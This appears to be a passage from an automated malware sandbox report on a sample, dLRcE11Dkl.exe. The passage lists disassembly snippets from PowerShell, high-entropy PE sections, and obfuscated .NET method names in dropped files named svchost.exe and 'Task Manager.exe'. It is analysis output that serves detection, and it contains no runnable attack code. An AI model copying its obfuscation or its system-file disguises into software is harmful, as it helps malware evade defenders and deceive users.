                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34872316 push 8B485F91h; iretd 10_2_00007FFD3487231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD3467D2A5 pushad ; iretd 12_2_00007FFD3467D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34862316 push 8B485F92h; iretd 12_2_00007FFD3486231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD3466D2A5 pushad ; iretd 16_2_00007FFD3466D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD3478097D push E95A22D0h; ret 16_2_00007FFD347809C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD3478C2C5 push ebx; iretd 16_2_00007FFD3478C2DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD34852316 push 8B485F93h; iretd 16_2_00007FFD3485231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD3465D2A5 pushad ; iretd 19_2_00007FFD3465D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD348476F2 push eax; ret 19_2_00007FFD348476F3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34840912 push eax; ret 19_2_00007FFD34840913
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34847512 push eax; ret 19_2_00007FFD34847513
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34842316 push 8B485F94h; iretd 19_2_00007FFD3484231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD3484011A push eax; ret 19_2_00007FFD3484011B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34842D32 push eax; ret 19_2_00007FFD34842D33
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34840D59 push eax; ret 19_2_00007FFD34840D93
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34840542 push eax; ret 19_2_00007FFD34840543
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34840062 push eax; ret 19_2_00007FFD34840063
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34841292 push eax; ret 19_2_00007FFD34841293
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD348480BE push edx; ret 19_2_00007FFD348480D3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34843A12 push eax; ret 19_2_00007FFD34843A13
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD3484001A push eax; ret 19_2_00007FFD3484001B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34840002 push eax; ret 19_2_00007FFD34840003
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34845425 push eax; ret 19_2_00007FFD3484543B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD34848A5A push eax; ret 19_2_00007FFD34848A5B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD3484225A push eax; ret 19_2_00007FFD3484225B
                        Source: dLRcE11Dkl.exeStatic PE information: section name: .text entropy: 7.969273400624172
                        Source: All function.cmd.0.drStatic PE information: section name: .text entropy: 7.995521906741566
                        Source: dLRcE11Dkl.exe, Wigvk0CbYCVCKiwdQW7pvcTwDKYA740FwRxw5uTWiZdauz4qml.csHigh entropy of concatenated method names: 'M9BHlu5LJtRCf1kNofXhvDiLOjGFLWYUaKOalsOwnCCUAepP7S', 'dnggex9uIaywBnMo9rUewUBai7sNT9h5mtmmeeqyfuINWJHRmW', 'lWzREqENw1J7hhTTP1M8SjDHvx32aSjhMFcemIyj4k5OjhEeyv', 'f95PQh9vQ74P3DWVnE30fMdFKPJWBfMw4rKbobHWxmTZXOYLRA', 'ml0Ks3eqMu8ItHP3aSryboH6EAiomvyA34Sb9XxUwOV4ijv0k9', 'YalRTB4iCEgjhN5JBg2tpZqRlNPO3gClsZ0PpQTLxCPmwDBZhc', '_1hFjBPenbWwKRqBqSRVsq7yLBsy8WV3ZgXfOrudOpsWMwtehle', 'WESRuSg4E3Uf2vyGCJRxGhQ3gY6sUFiRxvZapE2P58EzXnU6HE', 'utWa9gSlU06Qm7sbv4i8V6Tsy2ZtsRcZ0Zw5gDQsBXidzRQrcB', 'wOX6cBMcxb10iVN8Os2RrMJ1ESdgxQVyicloV1WpBZpkMWDoEf'
                        Source: dLRcE11Dkl.exe, 6FT7pE2wXqrYGPQa5MburPYyRmNPNPPwVDp1YBiWSFAnBDFvbQLd8xV9pUDrBUnRQ.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_8cdoYEV0nSaEV3a77d4peiLOfniaAJn9mYrZAVg0t01gkWc4bD', 'oB5hYg9aasO6ZLLU65yA6jffnyK5QsrFtDHthSmxTvIFOqowb6', 'KhAvRvlHWlN6PggG5e1NdFL2Fijtt8WfuO1Yiau3FsBlN0Qf9t', 'MHFd59bevbEUYfdVzZzqAEqTsd1AaKQbWvXn0P2rGPBAezspoc'
                        Source: svchost.exe.0.dr, H1K69lOkhiGBu3la6nan80U4LR1WK.csHigh entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
                        Source: svchost.exe.0.dr, bwR3VWEWBCLSgcxWw04.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
                        Source: svchost.exe.0.dr, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.csHigh entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
                        Source: svchost.exe.0.dr, 5QxGXOnu1Vu.csHigh entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.csHigh entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
                        Source: svchost.exe.0.dr, IAdtlBkckGw.csHigh entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
                        Source: svchost.exe.0.dr, 4CJBoxrumcU.csHigh entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
                        Source: svchost.exe.0.dr, taLg97lfy9j.csHigh entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
                        Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csHigh entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 'cMcUuo0NeXcTC220n6asyoSddKOoINnXTXV9AqWmQcDlAwC8WzEdAqYNoZUoS745k2J4j', 'uxa5ikT1ZUIZdE6i6ERAWl1k81qclTsBai1NJ4agQeOPiM4PejGIEKTD5mIId5kNWkrjT', 'Y3bSF2JcUm79bs6HNJfk1SrdYfsj8C9B0hXA1iccUgOPOqUEtaRaOQKBDqT3LCBSy2tba'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, H1K69lOkhiGBu3la6nan80U4LR1WK.csHigh entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, bwR3VWEWBCLSgcxWw04.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.csHigh entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 5QxGXOnu1Vu.csHigh entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.csHigh entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.csHigh entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 4CJBoxrumcU.csHigh entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, taLg97lfy9j.csHigh entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csHigh entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 'cMcUuo0NeXcTC220n6asyoSddKOoINnXTXV9AqWmQcDlAwC8WzEdAqYNoZUoS745k2J4j', 'uxa5ikT1ZUIZdE6i6ERAWl1k81qclTsBai1NJ4agQeOPiM4PejGIEKTD5mIId5kNWkrjT', 'Y3bSF2JcUm79bs6HNJfk1SrdYfsj8C9B0hXA1iccUgOPOqUEtaRaOQKBDqT3LCBSy2tba'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, H1K69lOkhiGBu3la6nan80U4LR1WK.csHigh entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, bwR3VWEWBCLSgcxWw04.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.csHigh entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 5QxGXOnu1Vu.csHigh entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.csHigh entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.csHigh entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 4CJBoxrumcU.csHigh entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, taLg97lfy9j.csHigh entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.csHigh entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 'cMcUuo0NeXcTC220n6asyoSddKOoINnXTXV9AqWmQcDlAwC8WzEdAqYNoZUoS745k2J4j', 'uxa5ikT1ZUIZdE6i6ERAWl1k81qclTsBai1NJ4agQeOPiM4PejGIEKTD5mIId5kNWkrjT', 'Y3bSF2JcUm79bs6HNJfk1SrdYfsj8C9B0hXA1iccUgOPOqUEtaRaOQKBDqT3LCBSy2tba'
                        Source: Task Manager.exe.2.dr, Fb4m7RJe0Qv.csHigh entropy of concatenated method names: 'hjHzm4Pfyt5', 'ZKRYmVy2Pv1', 'rp5q1rsDuD4', 'TLmoWdZk4gJ8qlxtTzfYgkPF00H0sBWArm8lExQOZQr8Zy', 'gJFZJlJrWXFSvau2STYju30ORJ4DKuWMdIzOajpy5UUwoe', 'bvVp302JnxSq8md2X5Dnci6nA5TdvoCeH66yUEwX2B9CGMitUJ0ONBXHwI12lzkGiMvTeRuL6SJM5X', 'SwBiJs8rzz86BTFzuyi982qmNZ46ZcmO1PYSjfx7nU8A2hzP3DGZLA9iur0xGZwjqEEryNQLfBFVR6', 'Vu4aKnlkz1RqTlm5Bpqmx0vm41aTKADkKvDmkJ15HWphvBFWDi6gfKrkhYKLBGfzDpV8qjWyWoxX82', 'nVhPHaUcERABlTlnWEc5R21lzCatKHxQV1fYhhbaCR8AUZAp8cjnCdgkX9RIC3FxY8brpAkrs0nYAG', '_3uUG9xmKVKB0MjaBorJ8D81X3ZyeUH1z11kXwxl5UJnO1nqZM2zUk9fjhSl9KMRsxVPuERr5VIlUvm'
                        Source: Task Manager.exe.2.dr, nDwO6BynlAqZFkwwCrH6PHnMDKRT6I6AlLjf.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'KMATUiWYcLiKK8JvGZLFrauR60FwMfdZaXaJ6qpPN70T1xH08dp33rXKYqhjoWD7F24Evj8Ez7wwdRko2gO7c5', 'v9oqCZE3V8qhw1zgvo5HkJV8eRSi', 'c8htM59CZqtZreHywCACSb3iUx4I', 'T4PJNo2lxTWYM5W64SERny35ZTfu'
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.csHigh entropy of concatenated method names: '_1TUjl1yTF2P', 'oOOMGaeCsXN', '_6fsMrvJ0bLK', 'nLUzlYPcLGh', 'iE7H0Y2RqRu', 'Ae8dXrsR6eZ', 'Y7T3WA7JVpW', 'kkFOZQP9LNE', 'TAqg7ZBLQ0u', 'bgWTYmHjvn2'
